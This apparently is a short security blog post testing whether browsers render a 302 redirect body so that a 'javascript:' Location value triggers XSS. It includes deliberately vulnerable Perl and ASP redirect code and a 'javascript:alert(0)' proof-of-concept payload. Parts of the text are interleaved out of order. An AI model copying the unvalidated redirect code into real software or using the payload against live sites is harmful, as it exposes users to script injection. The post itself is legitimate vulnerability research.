These days, response body of 302 redirect, like below, is difficult to see. Modern browsers can handle 302 redirect automatically.
However, if we can see this 302 redirect page with default settings, it is a little interesting.
| Chrome | IE | Firefox | Opera(Presto) | |
| Normal | NG | NG | NG | NG |
| Blank | OK | NG | OK | OK |
| about:blank | NG | NG | NG | OK |
| javascript:xxx | NG | NG | NG | OK(Excellent!) |
Although, Opera announced it would drop its own Presto engine, minor web servers' xss flaw can be available.
Apache2.4.7+Perl
Vulnerable perl sample code:
#! /usr/bin/perl --Normal response of Apache 302 redirect is below:
use CGI;
my $cgi = CGI->new();
my $url = $cgi->param("url");
print "Location: ".$url."\n\n";
HTTP/1.1 302 FoundIt looks that famous XSS vactor '<a href="javascript:xxxx">' is available. Then, result is:
Date: Mon, 15 Sep 2014 13:24:05 GMT
Server: Apache/2.4.7 (Ubuntu)
Location: http://www.example.com/
Content-Length: 281
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.example.com/">here</a>.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at localhost Port 80</address>
</body></html>
Provably, this 302 redirect response body is hard coded on apache source code.
IIS 7.5 (Windows7) + asp
Sample code:
Result:IIS 7.5 (Windows7) + asp
Sample code:
<%
Response.Redirect Request.QueryString("url")
%>
WEBrick/1.3.1
Response:
HTTP/1.1 302 Found
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Location: javascript:alert(0)
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-Request-Id: bb768842-983e-4ef8-b0e7-795193db1a96
X-Runtime: 0.007491
Server: WEBrick/1.3.1 (Ruby/2.1.2/2014-05-08)
Date: Sun, 06 Jul 2014 12:00:51 GMT
Content-Length: 85
Connection: Keep-Alive
<html><body>You are being <a href="javascript:alert(0)">redirected</a>.</body></html>
Very close! It doesn't work with Presto because of CRLF but works with FireFox5.
And I still have a minor alternative :)
0 件のコメント:
コメントを投稿